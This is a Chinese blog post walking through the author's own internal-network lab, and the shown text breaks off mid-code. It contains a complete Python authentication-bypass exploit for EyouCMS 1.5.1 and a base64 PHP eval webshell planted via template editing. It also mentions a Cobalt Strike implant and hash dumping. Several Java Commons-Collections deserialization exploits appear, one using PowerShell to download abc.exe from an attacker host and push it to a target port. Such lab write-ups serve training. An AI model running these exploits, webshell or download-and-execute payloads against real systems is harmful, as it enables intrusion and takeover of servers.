{"id":611,"date":"2024-09-07T13:25:47","date_gmt":"2024-09-07T05:25:47","guid":{"rendered":"https:\/\/www.nightying.com\/?p=611"},"modified":"2024-09-08T12:46:28","modified_gmt":"2024-09-08T04:46:28","slug":"vsmoonbachang","status":"publish","type":"post","link":"https:\/\/www.nightying.com\/index.php\/2024\/09\/07\/vsmoonbachang\/","title":{"rendered":"vsmoon\u5185\u7f51\u9776\u573a"},"content":{"rendered":"\n

\u5f00\u65b0\u7bc7\u7ae0\uff0c\u8df3\u8fc7\u642d\u5efa\uff0c\u7b80\u5355\u4ecb\u7ecd\u4e00\u4e0b<\/p>\n\n\n\n

webIP\uff1a192.168.0.102<\/p>\n\n\n\n

<\/p>\n\n\n\n

WEB\u90e8\u5206<\/h2>\n\n\n\n

\u5148\u4e0agoby\u626b\u4e00\u626b<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

16\u4e2a\u7aef\u53e3\uff0c1\u4e2asmb\uff0c1\u4e2amysql\uff0c\u8fd8\u67093\u4e2ahttp\uff0c\u4f46\u662f2\u4e2aNot Found<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n

PHP\u5199\u7684\uff0c\u626b\u4e2a\u76ee\u5f55\u770b\u770b<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\u597d\u50cf\u662fthinkphp5\u6846\u67b6<\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\u626b\u5230\u4e2a\u540e\u53f0<\/p>\n\n\n\n

\/login.php<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
finger\u548cehole\u90fd\u627e\u4e0d\u5230\u662f\u4ec0\u4e48\u6307\u7eb9\uff0c\u6309\u7406\u8bf4\u9776\u573a\u4e00\u534aweb\u90fd\u662fcms<\/p>\n\n\n\n
hash\u4e86\u4e00\u4e0b\u56fe\u6807\uff0c\u4e0afofa\u627e\u4e86\u4e2a\u540c\u56fe\u6807\u7684web\uff0c\u5e94\u8be5\u662feyoucms<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u627e\u627e\u5bf9\u5e94\u7684\u5386\u53f2\u6f0f\u6d1e\uff08\u867d\u7136\u6211\u4e5f\u4e0d\u77e5\u9053\u662f\u4ec0\u4e48\u7248\u672c\uff09<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u627e\u5230\u4e2a\u7248\u672c\u67e5\u770b\u7684\u65b9\u5f0f\uff0c\u65e0\u8111\u62fc\u63a5\u4e86\u4e00\u4e0b\u3002\u3002\u8fd8\u771f\u7ed9\u6211\u627e\u52301.5.1\u7248\u672c<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u627e\u5230\u4e00\u7bc7\u6587\u7ae0\uff0c\u590d\u73b0\u4e00\u4e0b\u6f0f\u6d1e\uff1ahttps:\/\/blog.csdn.net\/m0_69801663\/article\/details\/135298635<\/a><\/p>\n\n\n\n
\u7528\u6587\u7ae0\u63d0\u4f9b\u7684\u4ee3\u7801\u8dd1\u4e00\u904d<\/p>\n\n\n\n
# -*- coding:utf-8 -*-\nfrom time import time\n \nimport requests\nimport re\n \n# \u5b9a\u4e49 header \u5934, \u7ed5\u8fc7 isAjax\nheader = {'x-requested-with': 'xmlhttprequest'}\n \n# \u5b9a\u4e49\u4e00\u4e2a requests \u4f1a\u8bdd\nrequest = requests.session()\n \nPHPSESSION = \"\"\n \n \n# \u7ed5\u8fc7\u7b2c\u4e00\u4e2a\u5224\u65ad\ndef get_session(url):\n    global PHPSESSION\n \n    # \u8bbe\u7f6e admin_id \u5e76\u4e14\uff0c\u83b7\u53d6 PHPSESSION\n    payload = '\/index.php'\n    result = request.get(url=url + payload, headers=header)\n    # \u83b7\u53d6PHPSESSION\n    print(\"[+] PHPSESSION = \" + re.search(\"PHPSESSID=(.*?);\", result.headers[\"set-cookie\"]).groups()[0])\n    PHPSESSION = re.search(\"PHPSESSID=(.*?);\", result.headers[\"set-cookie\"]).groups()[0]\n \n \ndef set_admin_id(url):\n    # \u8bbe\u7f6e\u4e00\u4e2a admin_id \u4ee5\u7ed5\u8fc7\uff0c\u7b2c\u4e00\u4e2a\u6761\u4ef6\n    payload = '\/index.php?m=api&c=ajax&a=get_token&name=admin_id'\n    result = request.get(url=url + payload, headers=header).text\n    print(f\"[+] \u6b63\u5728\u8bbe\u7f6e admin_id -> [{result}]\")\n \n \ndef set_admin_login_expire(url):\n    payload = \"\/index.php?m=api&c=ajax&a=get_token&name=admin_login_expire\"\n \n    while True:\n        result = request.get(url=url + payload, headers=header).text\n \n        # \u7b2c\u4e8c\u4e2a\u5224\u65ad\u6761\u4ef6\uff0c\u5224\u65ad\u767b\u5f55\u662f\u5426\u5728\u4e00\u5c0f\u65f6\u91cc\n        if (time() - int(change(result), 10) < 3600):\n            print(\"[+] admin_login_expire = \" + result)\n            break\n \n        print(f\"[INFO] \u6b63\u5728\u7206\u7834 admin_login_expire -> [{result}]\")\n \n \ndef set_admin_info_role_id(url):\n    payload = \"\/index.php?m=api&c=ajax&a=get_token&name=admin_info.role_id\"\n \n    while True:\n        result = request.get(url=url + payload, headers=header).text\n \n        # \u7b2c\u4e09\u4e2a\u5224\u65ad\u6761\u4ef6\uff0c\u5224\u65ad\u662f\u5426\u662f\u7ba1\u7406\u5458\u6743\u9650\n        if (int(change(result), 10) <= 0):\n            print(\"[+] admin_login_expire = \" + result)\n            break\n \n        print(f\"[INFO] \u6b63\u5728\u7206\u7834 admin_info.role_id -> [{result}]\")\n \n \ndef check_login(url):\n    payload = \"login.php?m=admin&c=System&a=web&lang=cn\"\n    result = request.get(url=url + payload).text\n \n    if \"\u7f51\u7ad9LOGO\" in result:\n        print(f\"[+] \u4f7f\u7528 PHPSESSION -> [{PHPSESSION}] \u767b\u5f55\u6210\u529f\uff01\")\n    else:\n        print(f\"[+] \u4f7f\u7528 PHPSESSION -> [{PHPSESSION}] \u767b\u5f55\u5931\u8d25\uff01\")\n \n# \u5982\u679c\u7b2c\u4e00\u4e2a\u5b57\u7b26\u4e3a\u5b57\u6bcd\u5c31\u76f4\u63a5\u8fd4\u56de0\uff0c\u4e0d\u662f\u5219\u76f4\u5230\u627e\u5230\u5b57\u6bcd\uff0c\u5e76\u4e14\u8fd4\u56de\u524d\u9762\u4e0d\u662f\u5b57\u6bcd\u7684\u5b57\u7b26\ndef change(string):\n    temp = ''\n    for n, s in enumerate(string):\n        if n == 0:\n            if s.isalpha():\n                return '0'\n                break\n        if s.isdigit():\n            temp += str(s)\n        else:\n            if s.isalpha():\n                break\n    return temp\n \n \ndef run(url):\n    # \u5f00\u59cb\u8ba1\u65f6\n    time_start = time()\n \n    get_session(url)\n    set_admin_id(url)\n    set_admin_login_expire(url)\n    set_admin_info_role_id(url)\n    check_login(url)\n \n    print(f\"[+] PHPSESSION = {PHPSESSION}\")\n \n    # \u7ed3\u675f\u8ba1\u65f6\n    time_end = time()\n \n    print(f\"[+] \u603b\u5171\u7528\u65f6 {int(time_end) - int(time_start)} s\")\n \n \nif __name__ == '__main__':\n    url = \"\"\n    run(url)<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u53bb\u7f51\u7ad9\u7684\u540e\u53f0\u770b\u770b\uff0c\u66ff\u6362PHPSESSID<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u6210\u529f\u8fdb\u5165\u540e\u53f0\uff0c\u8fd9\u91cc\u9700\u8981\u6ce8\u610f\uff0c\u6bcf\u4e00\u4e2aPHPSESSID\u90fd\u8981\u8bbe\u7f6e\u4e3a\u8dd1\u51fa\u6765\u7684\u503c\uff08\u6709\u5f88\u591a\u4e2a\u5305\uff09\uff0c\u5426\u5219\u4f1a\u88ab\u5f39\u51fa\u53bb<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u70b9\u51fb\u66f4\u591a\u529f\u80fd\uff0c\u70b9\u51fb\u6a21\u677f\u7ba1\u7406\uff0c\u627e\u5230pc\/index.htm<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u5199\u4e00\u4e2a\u4e00\u53e5\u8bdd\u6728\u9a6c\uff1a\n<?=file_put_contents(\".\/uploads\/allimg\/ying.php\",base64_decode(\"PD9waHAgZXZhbCgkX1BPU1RbJ3lpbmcnXSkgPz4=\"));\n\u8fde\u63a5\u5bc6\u7801\u4e3aying<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u8bbf\u95ee\u4e00\u6b21index.php\u540e\uff0c\u518d\u7528\u8681\u5251\u8fde\u63a5\/uploads\/allimg\/ying.php<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u751a\u81f3\u4e0d\u7528\u63d0\u6743\uff0c\u76f4\u63a5\u4e0aCS\u9a6c<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
CS\u4e0a\u7ebf<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n\n\n\n
DATA\u90e8\u5206<\/h2>\n\n\n\n
\u5148\u505a\u4e2a\u4fe1\u606f\u6536\u96c6<\/p>\n\n\n\n
\u770b\u770bIP<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u6293\u4e2ahash<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u521b\u4e2a\u4ee3\u7406\u8f6c\u53d1\u548csock\u4ee3\u7406<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
<\/p>\n\n\n\n
\u4e0a\u4e2afscan\u5f00\u626b\uff0c146\u5f00\u653e\u4e86135,445,139,9999\u5e76\u4e14\u8ba1\u7b97\u673a\u540d\u4e3adata\uff0c\u8fd8\u6709\u4e00\u4e2a\u7f51\u6bb5\u4e3a10.10.10.136\uff0c\u5728\u57dfvsmoon.com\u4e2d<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u6709\u4e2a9999\u7aef\u53e3\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u662f\u4ec0\u4e48\u534f\u8bae\uff0c\u6309\u7167\u9776\u573a\u7684\u601d\u7ef4\u6765\u8bf4\uff0c\u8fd9\u4e2a9999\u5e94\u8be5\u5c31\u662f\u7a81\u7834\u53e3\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u662f\u4ec0\u4e48\u4e1c\u897f\uff0c\u7ffb\u7ffbweb\u670d\u52a1\u5668\u770b\u770b<\/p>\n\n\n\n
\u7ffb\u4e86\u7ffb\u684c\u9762\uff0c\u6709\u4e2atxt\u548cjar<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
jar\u597d\u50cf\u662f\u4e2a\u5ba2\u6237\u7aef\uff0c\u591a\u534a\u662f\u7a81\u7834\u53e3\u4e86\uff0c\u4f46\u662f\u6211\u4e0d\u4f1a\u9006\u5411\u3002\u3002\u574f\u4e86<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u5c1d\u8bd5\u8fde\u4e0a\u53bb\u770b\u770b\u5148\uff0c\u4e0bjar\u5230\u672c\u5730\uff0c\u7136\u540e\u8fde\u4e0a\u4ee3\u7406<\/p>\n\n\n\n
\uff08\u642d\u9776\u573a\u7684\u65f6\u5019\uff0c\u6709\u6539\u8fc7\u7f51\u6bb5\uff0c\u73b0\u5728\u8fde\u4e0d\u4e0a\u4e86\uff0c\u4f46\u662f\u53ef\u4ee5\u80af\u5b9a\u7684\u662f9999\u7aef\u53e3\u662f\u5f00\u653e\u7ed9\u8fd9\u4e2a\u8f6f\u4ef6\u7684\uff09<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u7528Jadx-gui\u9006\u4e00\u4e0b\u8fd9\u4e2a\u5305https:\/\/github.com\/skylot\/jadx\/releases\/tag\/v1.5.0<\/a><\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u8fd9\u4e2a\u597d\u50cf\u770b\u7740\u4e0d\u96be\uff0c\u6211\u4ee3\u7801\u5ba1\u8ba1\u4e00\u4e0b\uff08java\u529f\u5e95\u771f\u7684\u4e00\u822c\uff0c\u6211\u4e0aGPT\u8f85\u52a9\u4e86\uff09<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u597d\u50cf\u662f\u5b58\u5728\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u7684\uff0c\u4f46\u662f\u8981\u5199\u5bf9\u5e94\u7684\u4ee3\u7801\uff0c\u8fd8\u5f97\u6709\u53cd\u5e8f\u5217\u5316\u5229\u7528\u94fe\uff08\u9700\u8981\u6709\u7ecf\u9a8c\u79ef\u7d2f\uff09\uff08\u4ee3\u7801\u6211\u8fd8\u80fd\u9760\u4e00\u9760GPT\uff0c\u53cd\u5e8f\u5217\u5316\u5229\u7528\u94fe\u6211\u662f\u771f\u6ca1\u57fa\u7840\u4e86\uff0c\u53bb\u770b\u4e86\u4e00\u4e0b\u590d\u73b0\u6559\u7a0b\uff0c\u8fd9\u91cc\u662f\u7528\u7684cc1\u3010commons-collections\u3011\uff0c\u5e76\u4e14\u63d0\u793a\u4e86\u8f6c\u6362\u7c7b\u578b\u51fa\u9519\u4f1a\u5bfc\u81f4\u5f02\u5e38\u9000\u51fa\uff0c\u8c28\u614e\u64cd\u4f5c\uff09<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u6211\u7528GPT\u5199\u4e86\u4e2a\u6d4b\u8bd5\u7684\u4ee3\u7801\uff0c\u5148\u5c1d\u8bd5\u9a8c\u8bc1\u4e00\u4e0b\uff1a<\/p>\n\n\n\n
<dependencies>\n        <dependency>\n            <groupId>commons-collections<\/groupId>\n            <artifactId>commons-collections<\/artifactId>\n            <version>3.2.1<\/version>\n        <\/dependency>\n<\/dependencies><\/code><\/pre>\n\n\n\n
import org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.map.TransformedMap;\n\nimport java.io.*;\nimport java.lang.reflect.Constructor;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class LocalExploitTest {\n    public static void main(String[] args) {\n        try {\n            \/\/ \u7b2c\u4e00\u6b65\uff1a\u521b\u5efa\u547d\u4ee4\u6267\u884c\u7684Transformer\u94fe\n            Transformer[] transformers = new Transformer[]{\n                    new ConstantTransformer(Runtime.class),\n                    new InvokerTransformer(\"getMethod\",\n                            new Class[]{String.class, Class[].class},\n                            new Object[]{\"getRuntime\", new Class[0]}),\n                    new InvokerTransformer(\"invoke\",\n                            new Class[]{Object.class, Object[].class},\n                            new Object[]{null, new Object[0]}),\n                    new InvokerTransformer(\"exec\",\n                            new Class[]{String.class},\n                            new Object[]{\"calc.exe\"})  \/\/ Windows\u73af\u5883\u4e0b\u6267\u884c\u8ba1\u7b97\u5668\u7a0b\u5e8f\n            };\n\n            \/\/ \u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528ChainedTransformer\u6765\u94fe\u63a5\u8fd9\u4e9bTransformer\n            Transformer transformerChain = new ChainedTransformer(transformers);\n\n            \/\/ \u7b2c\u4e09\u6b65\uff1a\u4f7f\u7528Map\u8fdb\u884c\u5305\u88c5\uff0c\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u65f6\u7684\u547d\u4ee4\u6267\u884c\n            Map innerMap = new HashMap();\n            innerMap.put(\"value\", \"test\");\n            Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);\n\n            \/\/ \u4f7f\u7528\u53cd\u5c04\u521b\u5efaAnnotationInvocationHandler\uff0c\u6765\u5229\u7528\u4ee3\u7406\u6267\u884c\n            Class cls = Class.forName(\"sun.reflect.annotation.AnnotationInvocationHandler\");\n            Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);\n            ctor.setAccessible(true);\n            Object instance = ctor.newInstance(java.lang.Override.class, outerMap);\n\n            \/\/ \u7b2c\u56db\u6b65\uff1a\u5e8f\u5217\u5316\u8be5\u6076\u610f\u5bf9\u8c61\u5230\u6587\u4ef6\n            FileOutputStream fileOut = new FileOutputStream(\"exploit_payload.bin\");\n            ObjectOutputStream out = new ObjectOutputStream(fileOut);\n            out.writeObject(instance);\n            out.close();\n            fileOut.close();\n\n            System.out.println(\"\u6076\u610f\u5bf9\u8c61\u5df2\u5e8f\u5217\u5316\u5230 exploit_payload.bin \u6587\u4ef6\");\n\n            \/\/ \u7b2c\u4e94\u6b65\uff1a\u53cd\u5e8f\u5217\u5316\u6076\u610f\u5bf9\u8c61\u5e76\u6267\u884c\u547d\u4ee4\n            FileInputStream fileIn = new FileInputStream(\"exploit_payload.bin\");\n            ObjectInputStream in = new ObjectInputStream(fileIn);\n            in.readObject();  \/\/ \u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u547d\u4ee4\u5c06\u88ab\u6267\u884c\n            in.close();\n            fileIn.close();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}<\/code><\/pre>\n\n\n\n
\u8fd0\u884c\u7684\u65f6\u5019\u6ca1\u6709\u89e6\u53d1<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u770b\u6765\u662f\u7248\u672c\u95ee\u9898\uff0c\u9700\u8981\u6539\u4e00\u4e0b\uff08\u5b58\u7591\uff09<\/p>\n\n\n\n
\u8fd8\u662f\u6ca1\u6cd5\u89e6\u53d1\uff0c\u6211\u62ff\u6697\u6708\u63d0\u4f9b\u7684\u4ee3\u7801\u8fdb\u884c\u4e86\u6bd4\u8f83\uff0c\u6211\u7528\u7684\u662fTransformedMap<\/strong>\uff0c\u6697\u6708\u7528\u7684\u662fLazyMap<\/strong><\/code>\u548cTiedMapEntry<\/strong><\/code>\u7684\u7ed3\u5408\u3002\u8fd9\u4e00\u6bb5\u8bdd\u5199\u7ed9\u672a\u6765\u4ee3\u7801\u5ba1\u8ba1\u7684\u6211\u3002<\/strong><\/p>\n\n\n\n
TransformedMap\u662f\u5c06\u67d0\u4e9b\u64cd\u4f5c\uff08\u5982 get()<\/code>\u3001put()<\/code>\uff09\u8f6c\u6362\u4e3a\u547d\u4ee4\u6267\u884c\uff0c\u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u4e0d\u4f1a\u6267\u884c\u547d\u4ee4\uff0c\u53ea\u6709\u5728\u5bf9 TransformedMap<\/code> \u8fdb\u884c\u64cd\u4f5c\u65f6\uff08\u4f8b\u5982\u8c03\u7528 get()<\/code> \u65b9\u6cd5\uff09\u624d\u4f1a\u89e6\u53d1\u547d\u4ee4\u6267\u884c\uff0c\u4e5f\u5c31\u662f\u624b\u52a8\u89e6\u53d1\u624d\u80fd\u6267\u884c\u547d\u4ee4\u3002<\/strong><\/p>\n\n\n\n
LazyMap<\/code>\u548cTiedMapEntry<\/code>\u7684\u7ed3\u5408\uff0c\u8fd9\u79cd\u7ed3\u6784\u5728 HashMap<\/code> \u5185\u90e8\u4f1a\u8c03\u7528 TiedMapEntry<\/code> \u7684 hashCode()<\/code> \u6216 equals()<\/code> \u65b9\u6cd5\uff0c\u8fd9\u4e9b\u65b9\u6cd5\u5728\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u4e2d\u4f1a\u81ea\u52a8\u88ab\u8c03\u7528\uff0c\u65e0\u9700\u624b\u52a8\u8c03\u7528 get()<\/code> \u6216\u5176\u4ed6\u65b9\u6cd5\uff0c\u4f1a\u81ea\u52a8\u6267\u884c\u547d\u4ee4\u3002<\/strong><\/p>\n\n\n\n
\u539f\u7406\uff1aJava \u7684 HashMap<\/code> \u5728\u5b58\u50a8\u548c\u6bd4\u8f83\u952e\u503c\u5bf9\u65f6\u4f1a\u8c03\u7528 hashCode()<\/code>\uff0c\u800c TiedMapEntry<\/code> \u4f1a\u5c06\u8be5\u8c03\u7528\u4f20\u9012\u7ed9 LazyMap<\/code>\uff0c\u4ece\u800c\u89e6\u53d1 LazyMap<\/code> \u7684 factory<\/code>\uff0c\u8fdb\u800c\u6267\u884c Transformer \u94fe\u3002<\/strong><\/p>\n\n\n\n
package nightying.com;\n\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\nimport org.apache.commons.collections.map.LazyMap;\n\nimport java.io.*;\nimport java.lang.reflect.Field;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Main {\n    public static void main(String[] args) {\n        try {\n            \/\/ \u7b2c\u4e00\u6b65\uff1a\u521b\u5efa\u547d\u4ee4\u6267\u884c\u7684Transformer\u94fe\n            Transformer[] transformers = new Transformer[]{\n                    new ConstantTransformer(Runtime.class),\n                    new InvokerTransformer(\"getMethod\",\n                            new Class[]{String.class, Class[].class},\n                            new Object[]{\"getRuntime\", new Class[0]}),\n                    new InvokerTransformer(\"invoke\",\n                            new Class[]{Object.class, Object[].class},\n                            new Object[]{null, new Object[0]}),\n                    new InvokerTransformer(\"exec\",\n                            new Class[]{String.class},\n                            new Object[]{\"calc.exe\"})  \/\/ Windows\u73af\u5883\u4e0b\u6267\u884c\u8ba1\u7b97\u5668\u7a0b\u5e8f\n            };\n\n            \/\/ \u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528ChainedTransformer\u6765\u94fe\u63a5\u8fd9\u4e9bTransformer\n            Transformer transformerChain = new ChainedTransformer(transformers);\n\n            \/\/ \u7b2c\u4e09\u6b65\uff1a\u4f7f\u7528LazyMap\u8fdb\u884c\u5305\u88c5\n            Map lazyMap = LazyMap.decorate(new HashMap(), new ConstantTransformer(1));\n            TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, \"key\");\n            HashMap hashMap = new HashMap<>();\n            hashMap.put(tiedMapEntry, \"value\");\n            lazyMap.remove(\"key\");\n\n            \/\/ \u4fee\u6539LazyMap\u7684factory\u5b57\u6bb5\uff0c\u66ff\u6362\u4e3aTransformer\u94fe\n            Field factoryField = LazyMap.class.getDeclaredField(\"factory\");\n            factoryField.setAccessible(true);\n            factoryField.set(lazyMap, transformerChain);\n\n            \/\/ \u76f4\u63a5\u5728\u5185\u5b58\u4e2d\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u5bf9\u8c61\n            ByteArrayOutputStream byteOut = new ByteArrayOutputStream();\n            ObjectOutputStream objectOut = new ObjectOutputStream(byteOut);\n            objectOut.writeObject(hashMap);\n            objectOut.close();\n\n            \/\/ \u7b2c\u56db\u6b65\uff1a\u53cd\u5e8f\u5217\u5316\u5bf9\u8c61\u5e76\u81ea\u52a8\u89e6\u53d1\u6267\u884c\n            ByteArrayInputStream byteIn = new ByteArrayInputStream(byteOut.toByteArray());\n            ObjectInputStream objectIn = new ObjectInputStream(byteIn);\n            objectIn.readObject();  \/\/ \u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u547d\u4ee4\u5c06\u88ab\u6267\u884c\n            objectIn.close();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}\n<\/code><\/pre>\n\n\n\n
\u6211\u7528GPT\u5199\u4e86\u4e00\u4e2a\u4e0b\u8f7d\u7684\u4ee3\u7801\uff1a<\/p>\n\n\n\n
import org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\nimport org.apache.commons.collections.map.LazyMap;\n\nimport java.io.ObjectOutputStream;\nimport java.io.OutputStream;\nimport java.lang.reflect.Constructor;\nimport java.lang.reflect.Field;\nimport java.net.Socket;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Exploit {\n    public static void main(String[] args) {\n        try {\n            \/\/ \u7b2c\u4e00\u6b65\uff1a\u521b\u5efa\u547d\u4ee4\u6267\u884c\u7684Transformer\u94fe\n            String url = \"http:\/\/192.168.24.152:12312\/abc.exe\"; \/\/ \u66ff\u6362\u4e3a\u4f60\u9700\u8981\u4e0b\u8f7d\u7684URL\n            String savePath = \"C:\\\\Users\\\\Public\\\\Downloads\\\\abc.exe\"; \/\/ \u4fdd\u5b58\u8def\u5f84\n\n            \/\/ \u4f7f\u7528PowerShell\u4e0b\u8f7d\u6587\u4ef6\u7684\u547d\u4ee4\n            String command = \"powershell.exe -Command \\\"Invoke-WebRequest '\" + url + \"' -OutFile '\" + savePath + \"'\\\"\";\n\n            Transformer[] transformers = new Transformer[]{\n                    new ConstantTransformer(Runtime.class),\n                    new InvokerTransformer(\"getMethod\",\n                            new Class[]{String.class, Class[].class},\n                            new Object[]{\"getRuntime\", new Class[0]}),\n                    new InvokerTransformer(\"invoke\",\n                            new Class[]{Object.class, Object[].class},\n                            new Object[]{null, new Object[0]}),\n                    new InvokerTransformer(\"exec\",\n                            new Class[]{String.class},\n                            new Object[]{command})  \/\/ \u6267\u884c\u4e0b\u8f7d\u547d\u4ee4\n            };\n\n            \/\/ \u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528ChainedTransformer\u6765\u94fe\u63a5\u8fd9\u4e9bTransformer\n            Transformer transformerChain = new ChainedTransformer(transformers);\n\n            \/\/ \u7b2c\u4e09\u6b65\uff1a\u6784\u5efaLazyMap\u548cTiedMapEntry\u7ed3\u6784\n            Map lazyMap = LazyMap.decorate(new HashMap(), new ConstantTransformer(1));\n            TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, \"key\");\n            HashMap hashMap = new HashMap();\n            hashMap.put(tiedMapEntry, \"value\");\n\n            \/\/ \u79fb\u9664lazyMap\u4e2d\u7684\u539f\u59cb\u952e\u503c\n            lazyMap.remove(\"key\");\n\n            \/\/ \u901a\u8fc7\u53cd\u5c04\u4fee\u6539LazyMap\u7684factory\u5b57\u6bb5\uff0c\u66ff\u6362\u4e3aTransformer\u94fe\n            Field factoryField = LazyMap.class.getDeclaredField(\"factory\");\n            factoryField.setAccessible(true);\n            factoryField.set(lazyMap, transformerChain);\n\n            \/\/ \u7b2c\u56db\u6b65\uff1a\u901a\u8fc7Socket\u8fde\u63a5\u5230\u76ee\u6807\u670d\u52a1\u5668\uff0c\u53d1\u9001\u6076\u610fpayload\n            Socket socket = new Socket(\"192.168.24.146\", 9999);  \/\/ \u8bf7\u66ff\u6362\u4e3a\u5b9e\u9645\u76ee\u6807IP\u548c\u7aef\u53e3\n            OutputStream outputStream = socket.getOutputStream();\n            ObjectOutputStream objectOutputStream = new ObjectOutputStream(outputStream);\n            objectOutputStream.writeObject(hashMap);  \/\/ \u53d1\u9001\u5305\u542b\u6076\u610fpayload\u7684HashMap\n\n            objectOutputStream.close();\n            outputStream.close();\n            socket.close();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}<\/code><\/pre>\n\n\n\n
\u6267\u884cabc.exe<\/p>\n\n\n\n
import org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\nimport org.apache.commons.collections.map.LazyMap;\n\nimport java.io.ObjectOutputStream;\nimport java.io.OutputStream;\nimport java.lang.reflect.Field;\nimport java.net.Socket;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Exploit {\n    public static void main(String[] args) {\n        try {\n            \/\/ \u7b2c\u4e00\u6b65\uff1a\u6784\u5efaTransformer\u94fe\uff0c\u7528\u4e8e\u6267\u884c\u4e0b\u8f7d\u7684\u6587\u4ef6\n            String execCommand = \"C:\\\\Users\\\\Public\\\\Downloads\\\\abc.exe\"; \/\/ \u66ff\u6362\u4e3a\u5df2\u4e0b\u8f7d\u7684\u6587\u4ef6\u8def\u5f84\n\n            \/\/ Transformer\u94fe\uff1a\u6267\u884c\u4e0b\u8f7d\u7684\u6587\u4ef6\n            Transformer[] execTransformers = new Transformer[]{\n                    new ConstantTransformer(Runtime.class),\n                    new InvokerTransformer(\"getMethod\",\n                            new Class[]{String.class, Class[].class},\n                            new Object[]{\"getRuntime\", new Class[0]}),\n                    new InvokerTransformer(\"invoke\",\n                            new Class[]{Object.class, Object[].class},\n                            new Object[]{null, new Object[0]}),\n                    new InvokerTransformer(\"exec\",\n                            new Class[]{String.class},\n                            new Object[]{execCommand})  \/\/ \u6267\u884c\u4e0b\u8f7d\u7684\u6587\u4ef6\n            };\n\n            \/\/ \u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528ChainedTransformer\u6765\u94fe\u63a5Transformer\u94fe\n            Transformer transformerChain = new ChainedTransformer(execTransformers);\n\n            \/\/ \u7b2c\u4e09\u6b65\uff1a\u6784\u5efaLazyMap\u548cTiedMapEntry\u7ed3\u6784\n            Map lazyMap = LazyMap.decorate(new HashMap(), new ConstantTransformer(1));\n            TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, \"key\");\n            HashMap hashMap = new HashMap();\n            hashMap.put(tiedMapEntry, \"value\");\n\n            \/\/ \u79fb\u9664lazyMap\u4e2d\u7684\u539f\u59cb\u952e\u503c\n            lazyMap.remove(\"key\");\n\n            \/\/ \u901a\u8fc7\u53cd\u5c04\u4fee\u6539LazyMap\u7684factory\u5b57\u6bb5\uff0c\u66ff\u6362\u4e3aTransformer\u94fe\n            Field factoryField = LazyMap.class.getDeclaredField(\"factory\");\n            factoryField.setAccessible(true);\n            factoryField.set(lazyMap, transformerChain);\n\n            \/\/ 